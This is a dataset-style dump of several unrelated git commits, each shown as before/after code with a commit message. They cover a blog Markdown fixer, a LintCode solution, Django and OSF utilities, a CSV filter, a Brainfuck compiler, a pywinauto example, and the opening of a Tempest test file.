for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
<commit_before><commit_msg>USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!<commit_after>#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
|
fc2a3635a37cd1dcfc2ea8705e2cae37b083b6a2
|
lintcode/Easy/181_Flip_Bits.py
|
lintcode/Easy/181_Flip_Bits.py
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
Add solution to lintcode problem 181
|
Add solution to lintcode problem 181
|
Python
|
mit
|
Rhadow/leetcode,Rhadow/leetcode,Rhadow/leetcode,Rhadow/leetcode
|
Add solution to lintcode problem 181
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
<commit_before><commit_msg>Add solution to lintcode problem 181<commit_after>
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
Add solution to lintcode problem 181class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
<commit_before><commit_msg>Add solution to lintcode problem 181<commit_after>class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
|
74ac965c451f29faa344be0161ebb419395faa6e
|
entities/context_processors.py
|
entities/context_processors.py
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
Exclude unusable users from stats
|
Exclude unusable users from stats
|
Python
|
agpl-3.0
|
stadtgestalten/stadtgestalten,stadtgestalten/stadtgestalten,stadtgestalten/stadtgestalten
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
Exclude unusable users from stats
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
<commit_before>from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
<commit_msg>Exclude unusable users from stats<commit_after>
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
Exclude unusable users from statsfrom . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
<commit_before>from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
<commit_msg>Exclude unusable users from stats<commit_after>from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
60b7935b1848de5675601d64fc78909a557684ae
|
osf/management/commands/add_egap_registration_schema.py
|
osf/management/commands/add_egap_registration_schema.py
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
Add a management command for adding egap registration schema.
|
Add a management command for adding egap registration schema.
|
Python
|
apache-2.0
|
felliott/osf.io,mattclark/osf.io,saradbowman/osf.io,aaxelb/osf.io,cslzchen/osf.io,baylee-d/osf.io,felliott/osf.io,Johnetordoff/osf.io,adlius/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,adlius/osf.io,adlius/osf.io,brianjgeiger/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,baylee-d/osf.io,aaxelb/osf.io,pattisdr/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,mattclark/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,cslzchen/osf.io,mfraezz/osf.io,adlius/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,aaxelb/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,mfraezz/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,aaxelb/osf.io
|
Add a management command for adding egap registration schema.
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
<commit_before><commit_msg>Add a management command for adding egap registration schema.<commit_after>
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
Add a management command for adding egap registration schema.# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
<commit_before><commit_msg>Add a management command for adding egap registration schema.<commit_after># -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
|
cf1d9fceb5b929a9f96acf7d0dca270109659e84
|
scripts/filter_csv.py
|
scripts/filter_csv.py
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
Python
|
bsd-3-clause
|
dmc2015/hall-of-justice,sunlightlabs/hall-of-justice,dmc2015/hall-of-justice,dmc2015/hall-of-justice,sunlightlabs/hall-of-justice,sunlightlabs/hall-of-justice
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
<commit_before><commit_msg>Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.<commit_after>
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
<commit_before><commit_msg>Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.<commit_after>#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
|
f5beda9ef523cc719d33bb3fd0f4deb349ff8cbd
|
bfcomp.py
|
bfcomp.py
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
Add not yet working compiler
|
Add not yet working compiler
|
Python
|
mit
|
ids1024/isbfc
|
Add not yet working compiler
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
<commit_before><commit_msg>Add not yet working compiler<commit_after>
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
Add not yet working compilerimport sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
<commit_before><commit_msg>Add not yet working compiler<commit_after>import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
|
4642ffee61d48372041acf92b23793e995d3948b
|
examples/win10_calculator.py
|
examples/win10_calculator.py
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. Few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with some trick for invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
Add an example for Win10 version of Calculator.
|
Add an example for Win10 version of Calculator.
|
Python
|
bsd-3-clause
|
cetygamer/pywinauto,vasily-v-ryabov/pywinauto,pywinauto/pywinauto,drinkertea/pywinauto,MagazinnikIvan/pywinauto,airelil/pywinauto
|
Add an example for Win10 version of Calculator.
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. Few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with some trick for invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
<commit_before><commit_msg>Add an example for Win10 version of Calculator.<commit_after>
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. Few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with some trick for invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
Add an example for Win10 version of Calculator."""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. Few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with some trick for invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
<commit_before><commit_msg>Add an example for Win10 version of Calculator.<commit_after>"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. Few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with some trick for invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
|
7ef0b8f1246074cf78c94314aab4f804be01a1e7
|
tempest/api/compute/admin/test_volumes_negative.py
|
tempest/api/compute/admin/test_volumes_negative.py
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
